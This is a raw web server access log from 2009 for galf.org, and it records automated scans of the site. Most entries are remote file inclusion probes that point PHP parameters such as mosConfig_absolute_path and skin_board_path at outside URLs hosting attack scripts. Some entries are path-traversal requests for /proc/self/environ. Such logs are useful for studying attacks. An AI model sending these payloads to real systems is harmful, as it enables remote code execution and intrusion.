66.102.237.81 - - [29/Nov/2009:20:16:36 -0800] "GET /?mosConfig_absolute_path=http://www.jjdd.co.kr/nalog/plug_in_config/pro/id1??? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
66.102.237.81 - - [29/Nov/2009:20:16:36 -0800] "GET /logs/?mosConfig_absolute_path=http://www.jjdd.co.kr/nalog/plug_in_config/pro/id1??? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.galf.org"
66.102.237.81 - - [29/Nov/2009:20:16:37 -0800] "GET /logs/access_090928.log/?mosConfig_absolute_path=http://www.jjdd.co.kr/nalog/plug_in_config/pro/id1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.102.237.81 - - [29/Nov/2009:20:16:37 -0800] "GET /?mosConfig_absolute_path=http://www.jjdd.co.kr/nalog/plug_in_config/pro/id1??? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
66.102.237.81 - - [29/Nov/2009:20:16:37 -0800] "GET /logs/?mosConfig_absolute_path=http://www.jjdd.co.kr/nalog/plug_in_config/pro/id1??? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.galf.org"
66.102.237.81 - - [29/Nov/2009:20:16:40 -0800] "GET /logs/access_090928.log/?mosConfig_absolute_path=http://www.jjdd.co.kr/nalog/plug_in_config/pro/id1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.102.237.81 - - [29/Nov/2009:20:16:40 -0800] "GET /logs/?mosConfig_absolute_path=http://www.jjdd.co.kr/nalog/plug_in_config/pro/id1??? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.galf.org"
66.102.237.81 - - [29/Nov/2009:20:16:40 -0800] "GET /?mosConfig_absolute_path=http://www.jjdd.co.kr/nalog/plug_in_config/pro/id1??? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
66.102.237.81 - - [29/Nov/2009:20:17:05 -0800] "GET /logs/access_090928.log/?mosConfig_absolute_path=http://www.jjdd.co.kr/nalog/plug_in_config/pro/id1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.102.237.81 - - [29/Nov/2009:20:17:05 -0800] "GET /logs/?mosConfig_absolute_path=http://www.jjdd.co.kr/nalog/plug_in_config/pro/id1??? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.galf.org"
66.102.237.81 - - [29/Nov/2009:20:17:05 -0800] "GET /?mosConfig_absolute_path=http://www.jjdd.co.kr/nalog/plug_in_config/pro/id1??? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
66.102.237.81 - - [29/Nov/2009:20:17:05 -0800] "GET /logs/access_090817.log/?mosConfig_absolute_path=http://www.jjdd.co.kr/nalog/plug_in_config/pro/id1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.102.237.81 - - [29/Nov/2009:20:17:11 -0800] "GET /?mosConfig_absolute_path=http://www.jjdd.co.kr/nalog/plug_in_config/pro/id1??? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
66.102.237.81 - - [29/Nov/2009:20:17:11 -0800] "GET /logs/?mosConfig_absolute_path=http://www.jjdd.co.kr/nalog/plug_in_config/pro/id1??? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.galf.org"
66.102.237.81 - - [29/Nov/2009:20:17:11 -0800] "GET /logs/access_090817.log/?mosConfig_absolute_path=http://www.jjdd.co.kr/nalog/plug_in_config/pro/id1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.102.237.81 - - [29/Nov/2009:20:17:16 -0800] "GET /logs/access_090817.log/?mosConfig_absolute_path=http://www.jjdd.co.kr/nalog/plug_in_config/pro/id1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.102.237.81 - - [29/Nov/2009:20:17:16 -0800] "GET /logs/?mosConfig_absolute_path=http://www.jjdd.co.kr/nalog/plug_in_config/pro/id1??? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.galf.org"
66.102.237.81 - - [29/Nov/2009:20:17:16 -0800] "GET /?mosConfig_absolute_path=http://www.jjdd.co.kr/nalog/plug_in_config/pro/id1??? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
66.102.237.81 - - [29/Nov/2009:20:17:16 -0800] "GET /?mosConfig_absolute_path=http://www.jjdd.co.kr/nalog/plug_in_config/pro/id1??? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
66.102.237.81 - - [29/Nov/2009:20:17:16 -0800] "GET /logs/?mosConfig_absolute_path=http://www.jjdd.co.kr/nalog/plug_in_config/pro/id1??? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.galf.org"
66.102.237.81 - - [29/Nov/2009:20:17:16 -0800] "GET /logs/access_090928.log/?mosConfig_absolute_path=http://www.jjdd.co.kr/nalog/plug_in_config/pro/id1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.102.237.81 - - [29/Nov/2009:20:17:17 -0800] "GET /?mosConfig_absolute_path=http://www.jjdd.co.kr/nalog/plug_in_config/pro/id1??? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
66.102.237.81 - - [29/Nov/2009:20:17:17 -0800] "GET /logs/?mosConfig_absolute_path=http://www.jjdd.co.kr/nalog/plug_in_config/pro/id1??? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.galf.org"
66.102.237.81 - - [29/Nov/2009:20:17:17 -0800] "GET /logs/access_090928.log/?mosConfig_absolute_path=http://www.jjdd.co.kr/nalog/plug_in_config/pro/id1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.102.237.81 - - [29/Nov/2009:20:17:20 -0800] "GET /?mosConfig_absolute_path=http://www.jjdd.co.kr/nalog/plug_in_config/pro/id1??? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
66.102.237.81 - - [29/Nov/2009:20:17:23 -0800] "GET /logs/access_090928.log/?mosConfig_absolute_path=http://www.jjdd.co.kr/nalog/plug_in_config/pro/id1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.102.237.81 - - [29/Nov/2009:20:17:23 -0800] "GET /logs/access_090817.log/?mosConfig_absolute_path=http://www.jjdd.co.kr/nalog/plug_in_config/pro/id1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.102.237.81 - - [29/Nov/2009:20:17:23 -0800] "GET /logs/?mosConfig_absolute_path=http://www.jjdd.co.kr/nalog/plug_in_config/pro/id1??? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.galf.org"
66.102.237.81 - - [29/Nov/2009:20:17:28 -0800] "GET /logs/access_091102.log%20%20/?mosConfig_absolute_path=http://www.jjdd.co.kr/nalog/plug_in_config/pro/id1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.102.237.81 - - [29/Nov/2009:20:17:30 -0800] "GET /logs/access_091102.log%20%20/?mosConfig_absolute_path=http://www.jjdd.co.kr/nalog/plug_in_config/pro/id1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.102.237.81 - - [29/Nov/2009:20:17:44 -0800] "GET /logs/access_091102.log/?mosConfig_absolute_path=http://www.jjdd.co.kr/nalog/plug_in_config/pro/id1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.102.237.81 - - [29/Nov/2009:20:17:54 -0800] "GET /logs/access_091102.log/?mosConfig_absolute_path=http://www.jjdd.co.kr/nalog/plug_in_config/pro/id1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.102.237.81 - - [29/Nov/2009:20:18:19 -0800] "GET /logs/access_091102.log/?mosConfig_absolute_path=http://www.jjdd.co.kr/nalog/plug_in_config/pro/id1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.102.237.81 - - [29/Nov/2009:20:18:20 -0800] "GET /logs/access_091102.log/?mosConfig_absolute_path=http://www.jjdd.co.kr/nalog/plug_in_config/pro/id1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
117.74.98.18 - - [29/Nov/2009:20:27:24 -0800] "GET /logs/access_091019.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://imtelkom.ac.id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
117.74.98.18 - - [29/Nov/2009:20:28:49 -0800] "GET /logs/access_090817.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://imtelkom.ac.id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
210.127.209.27 - - [29/Nov/2009:20:30:38 -0800] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
210.127.209.27 - - [29/Nov/2009:20:30:38 -0800] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
210.127.209.27 - - [29/Nov/2009:20:30:41 -0800] "GET /logs/access_090713.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
210.127.209.27 - - [29/Nov/2009:20:35:28 -0800] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
210.127.209.27 - - [29/Nov/2009:20:35:28 -0800] "GET /logs/access_090713.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
210.127.209.27 - - [29/Nov/2009:20:35:28 -0800] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
93.90.186.58 - - [29/Nov/2009:20:38:44 -0800] "GET /index.php?meio=http://www.koolee.com/cmdstate.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.15) Gecko/2009102814 Ubuntu/8.10 (intrepid) Firefox/3.0.15" "www.galf.org"
93.90.186.58 - - [29/Nov/2009:20:38:44 -0800] "GET /logs/index.php?meio=http://www.koolee.com/cmdstate.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.15) Gecko/2009102814 Ubuntu/8.10 (intrepid) Firefox/3.0.15" "www.galf.org"
93.90.186.58 - - [29/Nov/2009:20:38:45 -0800] "GET /index.php?meio=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.15) Gecko/2009102814 Ubuntu/8.10 (intrepid) Firefox/3.0.15" "www.galf.org"
93.90.186.58 - - [29/Nov/2009:20:38:45 -0800] "GET /logs/index.php?meio=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.15) Gecko/2009102814 Ubuntu/8.10 (intrepid) Firefox/3.0.15" "www.galf.org"
93.90.186.58 - - [29/Nov/2009:20:38:45 -0800] "GET /index.php?meio=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.15) Gecko/2009102814 Ubuntu/8.10 (intrepid) Firefox/3.0.15" "www.galf.org"
93.90.186.58 - - [29/Nov/2009:20:38:45 -0800] "GET /logs/index.php?meio=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.15) Gecko/2009102814 Ubuntu/8.10 (intrepid) Firefox/3.0.15" "www.galf.org"
93.90.186.58 - - [29/Nov/2009:20:38:45 -0800] "GET /errors.php?error=http://www.koolee.com/cmdstate.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.15) Gecko/2009102814 Ubuntu/8.10 (intrepid) Firefox/3.0.15" "www.galf.org"
93.90.186.58 - - [29/Nov/2009:20:38:45 -0800] "GET /logs/errors.php?error=http://www.koolee.com/cmdstate.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.15) Gecko/2009102814 Ubuntu/8.10 (intrepid) Firefox/3.0.15" "www.galf.org"
65.18.192.91 - - [29/Nov/2009:20:39:10 -0800] "GET /logs/access_090525.log////?_SERVER[DOCUMENT_ROOT]=http://jnhsolutions.com.au/datingsite/temp/userimages/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.18.192.91 - - [29/Nov/2009:20:39:10 -0800] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://jnhsolutions.com.au/datingsite/temp/userimages/1.txt?? HTTP/1.1" 200 4949 "-" "Mozilla/5.0" "www.galf.org"
65.18.192.91 - - [29/Nov/2009:20:39:10 -0800] "GET ///?_SERVER[DOCUMENT_ROOT]=http://jnhsolutions.com.au/datingsite/temp/userimages/1.txt?? HTTP/1.1" 200 1049 "-" "Mozilla/5.0" "www.galf.org"
65.18.192.91 - - [29/Nov/2009:20:39:14 -0800] "GET /logs/access_090525.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://jnhsolutions.com.au/datingsite/temp/userimages/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.18.192.91 - - [29/Nov/2009:20:39:14 -0800] "GET ///?_SERVER[DOCUMENT_ROOT]=http://jnhsolutions.com.au/datingsite/temp/userimages/1.txt?? HTTP/1.1" 200 1049 "-" "Mozilla/5.0" "www.galf.org"
65.18.192.91 - - [29/Nov/2009:20:39:14 -0800] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://jnhsolutions.com.au/datingsite/temp/userimages/1.txt?? HTTP/1.1" 200 4949 "-" "Mozilla/5.0" "www.galf.org"
65.18.192.91 - - [29/Nov/2009:20:39:16 -0800] "GET ///?_SERVER[DOCUMENT_ROOT]=http://jnhsolutions.com.au/datingsite/temp/userimages/1.txt?? HTTP/1.1" 200 1049 "-" "Mozilla/5.0" "www.galf.org"
65.18.192.91 - - [29/Nov/2009:20:39:16 -0800] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://jnhsolutions.com.au/datingsite/temp/userimages/1.txt?? HTTP/1.1" 200 4949 "-" "Mozilla/5.0" "www.galf.org"
65.18.192.91 - - [29/Nov/2009:20:39:17 -0800] "GET ///?_SERVER[DOCUMENT_ROOT]=http://jnhsolutions.com.au/datingsite/temp/userimages/1.txt?? HTTP/1.1" 200 1049 "-" "Mozilla/5.0" "www.galf.org"
65.18.192.91 - - [29/Nov/2009:20:39:17 -0800] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://jnhsolutions.com.au/datingsite/temp/userimages/1.txt?? HTTP/1.1" 200 4949 "-" "Mozilla/5.0" "www.galf.org"
65.18.192.91 - - [29/Nov/2009:20:39:17 -0800] "GET /logs/access_090525.log////?_SERVER[DOCUMENT_ROOT]=http://jnhsolutions.com.au/datingsite/temp/userimages/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.18.192.91 - - [29/Nov/2009:20:39:28 -0800] "GET /logs/access_090525.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://jnhsolutions.com.au/datingsite/temp/userimages/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.18.192.91 - - [29/Nov/2009:20:39:55 -0800] "GET /logs/access_090810.log////?_SERVER[DOCUMENT_ROOT]=http://jnhsolutions.com.au/datingsite/temp/userimages/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.18.192.91 - - [29/Nov/2009:20:40:07 -0800] "GET /logs/access_090810.log////?_SERVER[DOCUMENT_ROOT]=http://jnhsolutions.com.au/datingsite/temp/userimages/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.18.192.91 - - [29/Nov/2009:20:41:10 -0800] "GET /logs/access_090706.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://jnhsolutions.com.au/datingsite/temp/userimages/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.18.192.91 - - [29/Nov/2009:20:41:28 -0800] "GET /logs/access_090706.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://jnhsolutions.com.au/datingsite/temp/userimages/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.55.207.136 - - [29/Nov/2009:20:41:39 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
65.18.192.91 - - [29/Nov/2009:20:41:58 -0800] "GET /logs/access_090525.log////?_SERVER[DOCUMENT_ROOT]=http://jnhsolutions.com.au/datingsite/temp/userimages/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.18.192.91 - - [29/Nov/2009:20:41:58 -0800] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://jnhsolutions.com.au/datingsite/temp/userimages/1.txt?? HTTP/1.1" 200 4949 "-" "Mozilla/5.0" "www.galf.org"
65.18.192.91 - - [29/Nov/2009:20:41:58 -0800] "GET ///?_SERVER[DOCUMENT_ROOT]=http://jnhsolutions.com.au/datingsite/temp/userimages/1.txt?? HTTP/1.1" 200 1049 "-" "Mozilla/5.0" "www.galf.org"
65.18.192.91 - - [29/Nov/2009:20:42:00 -0800] "GET /logs/access_090525.log////?_SERVER[DOCUMENT_ROOT]=http://jnhsolutions.com.au/datingsite/temp/userimages/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.18.192.91 - - [29/Nov/2009:20:42:00 -0800] "GET ///?_SERVER[DOCUMENT_ROOT]=http://jnhsolutions.com.au/datingsite/temp/userimages/1.txt?? HTTP/1.1" 200 1049 "-" "Mozilla/5.0" "www.galf.org"
65.18.192.91 - - [29/Nov/2009:20:42:00 -0800] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://jnhsolutions.com.au/datingsite/temp/userimages/1.txt?? HTTP/1.1" 200 4949 "-" "Mozilla/5.0" "www.galf.org"
65.18.192.91 - - [29/Nov/2009:20:42:25 -0800] "GET /logs/access_090810.log////?_SERVER[DOCUMENT_ROOT]=http://jnhsolutions.com.au/datingsite/temp/userimages/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.18.192.91 - - [29/Nov/2009:20:42:32 -0800] "GET /logs/access_090810.log////?_SERVER[DOCUMENT_ROOT]=http://jnhsolutions.com.au/datingsite/temp/userimages/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.216.203.109 - - [29/Nov/2009:20:42:38 -0800] "GET /logs///include/mail.inc.php?skin_board_path=http://www.medprom.spb.ru/new/www/modules/cjaycontent/admin/editor2/id1a.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
209.216.203.109 - - [29/Nov/2009:20:42:38 -0800] "GET //include/mail.inc.php?skin_board_path=http://www.medprom.spb.ru/new/www/modules/cjaycontent/admin/editor2/id1a.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
209.216.203.109 - - [29/Nov/2009:20:42:38 -0800] "GET /logs/access.log%20%20///include/mail.inc.php?skin_board_path=http://www.medprom.spb.ru/new/www/modules/cjaycontent/admin/editor2/id1a.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
75.126.127.34 - - [29/Nov/2009:20:42:42 -0800] "GET //include/mail.inc.php?skin_board_path=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
75.126.127.34 - - [29/Nov/2009:20:42:42 -0800] "GET /logs/access.log///include/mail.inc.php?skin_board_path=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
75.126.127.34 - - [29/Nov/2009:20:42:42 -0800] "GET /logs///include/mail.inc.php?skin_board_path=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
75.126.127.34 - - [29/Nov/2009:20:42:43 -0800] "GET /logs///include/mail.inc.php?skin_board_path=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
75.126.127.34 - - [29/Nov/2009:20:42:43 -0800] "GET //include/mail.inc.php?skin_board_path=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
75.126.127.34 - - [29/Nov/2009:20:42:43 -0800] "GET /logs/access.log%20%20///include/mail.inc.php?skin_board_path=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
58.180.42.222 - - [29/Nov/2009:20:42:46 -0800] "GET /bbs/skin/happycast_category_bluishgreen/setup.php?dir=http://www.dhszgh.org/eBook.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.galf.org"
58.180.42.222 - - [29/Nov/2009:20:42:46 -0800] "GET /logs/access.log//bbs/skin/happycast_category_bluishgreen/setup.php?dir=http://www.dhszgh.org/eBook.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.galf.org"
58.180.42.222 - - [29/Nov/2009:20:42:46 -0800] "GET /logs//bbs/skin/happycast_category_bluishgreen/setup.php?dir=http://www.dhszgh.org/eBook.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.galf.org"
75.126.127.34 - - [29/Nov/2009:20:42:56 -0800] "GET /logs/access.log///include/mail.inc.php?skin_board_path=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
75.126.127.34 - - [29/Nov/2009:20:42:57 -0800] "GET /logs/access.log%20%20///include/mail.inc.php?skin_board_path=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
75.126.127.34 - - [29/Nov/2009:20:43:34 -0800] "GET //include/mail.inc.php?skin_board_path=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.126.127.34 - - [29/Nov/2009:20:43:34 -0800] "GET /logs/access_090622.log%20%20///include/mail.inc.php?skin_board_path=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.51.139.133 - - [29/Nov/2009:20:43:35 -0800] "GET /logs//bbs/skin/happycast_category_bluishgreen/setup.php?dir=http://www.dhszgh.org/eBook.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.galf.org"
211.51.139.133 - - [29/Nov/2009:20:43:35 -0800] "GET /bbs/skin/happycast_category_bluishgreen/setup.php?dir=http://www.dhszgh.org/eBook.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.galf.org"
211.51.139.133 - - [29/Nov/2009:20:43:35 -0800] "GET /logs/access.log//bbs/skin/happycast_category_bluishgreen/setup.php?dir=http://www.dhszgh.org/eBook.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.galf.org"
75.126.127.34 - - [29/Nov/2009:20:43:35 -0800] "GET /logs///include/mail.inc.php?skin_board_path=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.216.203.109 - - [29/Nov/2009:20:43:40 -0800] "GET //include/mail.inc.php?skin_board_path=http://www.medprom.spb.ru/new/www/modules/cjaycontent/admin/editor2/id1a.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.216.203.109 - - [29/Nov/2009:20:43:40 -0800] "GET /logs///include/mail.inc.php?skin_board_path=http://www.medprom.spb.ru/new/www/modules/cjaycontent/admin/editor2/id1a.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.216.203.109 - - [29/Nov/2009:20:43:40 -0800] "GET /logs/access_090622.log%20%20///include/mail.inc.php?skin_board_path=http://www.medprom.spb.ru/new/www/modules/cjaycontent/admin/editor2/id1a.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.234.21.178 - - [29/Nov/2009:20:43:52 -0800] "GET /logs/access.log//bbs/skin/happycast_category_bluishgreen/setup.php?dir=http://www.dhszgh.org/eBook.pdf??? HTTP/1.1" 404 - "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.galf.org"
218.234.21.178 - - [29/Nov/2009:20:43:52 -0800] "GET /bbs/skin/happycast_category_bluishgreen/setup.php?dir=http://www.dhszgh.org/eBook.pdf??? HTTP/1.1" 404 - "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.galf.org"
218.234.21.178 - - [29/Nov/2009:20:43:52 -0800] "GET /logs//bbs/skin/happycast_category_bluishgreen/setup.php?dir=http://www.dhszgh.org/eBook.pdf??? HTTP/1.1" 404 - "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.galf.org"
222.231.60.116 - - [29/Nov/2009:20:44:33 -0800] "GET /logs/access.log//bbs/skin/happycast_category_bluishgreen/setup.php?dir=http://www.dhszgh.org/eBook.pdf?? HTTP/1.1" 404 - "-" "Avant Browser (http://www.avantbrowser.com)" "www.galf.org"
222.231.60.116 - - [29/Nov/2009:20:44:33 -0800] "GET /logs//bbs/skin/happycast_category_bluishgreen/setup.php?dir=http://www.dhszgh.org/eBook.pdf?? HTTP/1.1" 404 - "-" "Avant Browser (http://www.avantbrowser.com)" "www.galf.org"
222.231.60.116 - - [29/Nov/2009:20:44:33 -0800] "GET /bbs/skin/happycast_category_bluishgreen/setup.php?dir=http://www.dhszgh.org/eBook.pdf?? HTTP/1.1" 404 - "-" "Avant Browser (http://www.avantbrowser.com)" "www.galf.org"
75.126.127.34 - - [29/Nov/2009:20:45:31 -0800] "GET /logs///include/mail.inc.php?skin_board_path=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.126.127.34 - - [29/Nov/2009:20:45:31 -0800] "GET //include/mail.inc.php?skin_board_path=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.126.127.34 - - [29/Nov/2009:20:45:31 -0800] "GET /logs/access_090803.log///include/mail.inc.php?skin_board_path=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.180.42.222 - - [29/Nov/2009:20:45:56 -0800] "GET /logs//bbs/skin/happycast_category_bluishgreen/setup.php?dir=http://www.dhszgh.org/eBook.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "galf.org"
58.180.42.222 - - [29/Nov/2009:20:45:56 -0800] "GET /bbs/skin/happycast_category_bluishgreen/setup.php?dir=http://www.dhszgh.org/eBook.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "galf.org"
58.180.42.222 - - [29/Nov/2009:20:45:56 -0800] "GET /logs/access.log//bbs/skin/happycast_category_bluishgreen/setup.php?dir=http://www.dhszgh.org/eBook.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "galf.org"
75.126.127.34 - - [29/Nov/2009:20:46:35 -0800] "GET /logs/access_090803.log///include/mail.inc.php?skin_board_path=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.234.21.178 - - [29/Nov/2009:20:46:47 -0800] "GET /logs//bbs/skin/happycast_category_bluishgreen/setup.php?dir=http://www.dhszgh.org/eBook.pdf??? HTTP/1.1" 404 - "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "galf.org"
